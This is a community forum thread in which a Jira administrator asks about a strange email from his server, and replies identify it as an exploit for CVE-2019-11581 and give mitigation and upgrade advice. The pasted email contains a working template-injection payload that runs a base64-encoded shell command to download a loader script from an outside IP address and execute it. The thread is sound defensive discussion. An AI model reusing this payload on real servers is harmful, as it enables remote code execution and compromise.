Forums
Home Product Q&A Discussion groups Articles Ask a question Search
Learning
Events
Champions

Forums

Articles
Create
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 
Product Q&A
See all
Community resources
Top groups
Explore all groups
Community resources
Learn
Community resources
Events
Community resources

got Weird Email from our JIRA application

Michael
Michael March 26, 2021

Hi,

 

       Please someone help me advise why we got weird email from our JIRA application. Our JIRA application version is (v6.0.2#6097-sha1:e270beb). Below are email message from our JIRA application.

 

[JIRA] #set ($cmd="bash -c {echo,c2ggLWMgIihjdXJsIC0tdXNlci1hZ2VudCBjdmVfMjAxOV8xMTU4MSBodHRwOi8vMTk0LjE0NS4yMjcuMjEvbGRyLnNofHx3Z2V0IC0tdXNlci1hZ2VudCBjdmVfMjAxOV8xMTU4MSAtcSAtTyAtIGh0dHA6Ly8xOTQuMTQ1LjIyNy4yMS9sZHIuc2gpfHNoIg==}|{base64,-d}|{bash,-i}") #set ($e="exp") #set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd)) #set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a)) #set($sc = $e.getClass().forName("java.util.Scanner")) #set($constructor = $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream"))) #set($scan=$constructor.newInstance($input).useDelimiter("\A")) #if($scan.hasNext()) $scan.next() #end

 

Thanks,

Michael

Answer
Watch
Like Be the first to like this
1005 views

4 answers

3 votes
Daniel Eads
Daniel Eads
Atlassian Team
Atlassian Team members are employees working across the company in a wide variety of roles.
April 1, 2021

Hi Michael,

I've looked through the command this string is attempting to execute, and believe the file it tries to download and run is a malware loader. I would advise taking these steps:

  1. Disable the "contact administrators" form in your Jira instance:
    1. Choose the  Administration () System.
    2. Choose General Configuration.
    3. Click Edit Settings.
    4. Scroll down to the Contact Administrators Form and set it to OFF.
    5. Click Update.
  2. Block the following URLs from being accessed by the internet, if you have a reverse proxy in front of your Jira instance:
    1. /secure/ContactAdministrators
    2. /secure/admin/SendBulkMail!default.jspa
    3. /admin/SendBulkMail!default.jspa
    4. /SendBulkMail!default.jspa
  3. Scan your server for malware
    1. The loader file in your question attempts to move the executable for iptables from /sbin/iptables to /sbin/iptables_  - I would consider the presence of that renamed executable to be proof that the loader script had run and that the server is likely compromised.
  4. Upgrade Jira to a recent version - any version released after July 10, 2019 should contain the fix for this CVE, as described in the security advisory for CVE-2019-11581 . Since you are currently on Jira 6.0, you will need to make at least one intermediary upgrade to 7.0 before continuing up to a more recent version of Jira. I would suggest the following upgrade path:
    1. 6.0 (your current version) -> 6.4 -> 7.0 -> 7.6.17 (the last release in 7.6 - which contains the fix for the CVE)
    2. See Upgrading Jira applications for more upgrade information
  5. At this point, I would suggest either considering a Cloud migration - our cloud migration assistant app supports Jira 7.6 and newer - or continue upgrading to a more recent version of Jira Server such as Jira 8.13.
Reply
0 votes
Michael
Michael May 10, 2021

Anyone can help for my issue?

Reply
0 votes
Bastien Lespinasse
Bastien Lespinasse April 1, 2021

Hello Michael,

 

We received the exact same emails not long ago. We decided to open a ticket on Atlassian support. We believe it is related to https://confluence.atlassian.com/adminjiraserver/jira-security-advisory-2019-07-10-1047539912.html and https://community.atlassian.com/t5/Jira-articles/CVE-2019-11581-Critical-Security-Advisory-for-Jira-Server-and/ba-p/1128241 but we are not sure.

 

Best regards,

Bastien.

View More Comments
Ramith Dilshan
Ramith Dilshan
I'm New Here
I'm New Here
Those new to the Atlassian Community have posted less than three times. Give them a warm welcome!
Get involved
April 20, 2021

Hi Bastien

Could you get a solution for this weird mail ?

Like
Bastien Lespinasse
Bastien Lespinasse May 19, 2021

Hello Ramith,

 

Atlassian confirmed that if your Jira has been upgraded to a fixed version, this is not a problem.

List of fixed versions:

  • 7.6.14
  • 7.13.5
  • 8.0.3
  • 8.1.2
  • 8.2.3
  • All versions higher than 8.3

Therefore, we were protected but we were definitely under attack.

Like
Reply
0 votes
Michael
Michael March 31, 2021

Hi Anyone can help me for this issue?

Reply

Suggest an answer

Log in or Sign up to answer
Jira
Jira
TAGS
AUG Leaders

Atlassian Community Events

    See all events
    Community
    Forums
    FAQs Forums guidelines
    Learning
    About learning Resources
    Events
    Champions
    Copyright © 2025 Atlassian
    Privacy Policy Terms Security
    Welcome illustration

    Welcome to the new Atlassian Community

    Online forums and learning are now in one easy-to-use experience.

    By continuing, you accept the updated Community Terms of Use and acknowledge the Privacy Policy. Your public name, photo, and achievements may be publicly visible and available in search engines.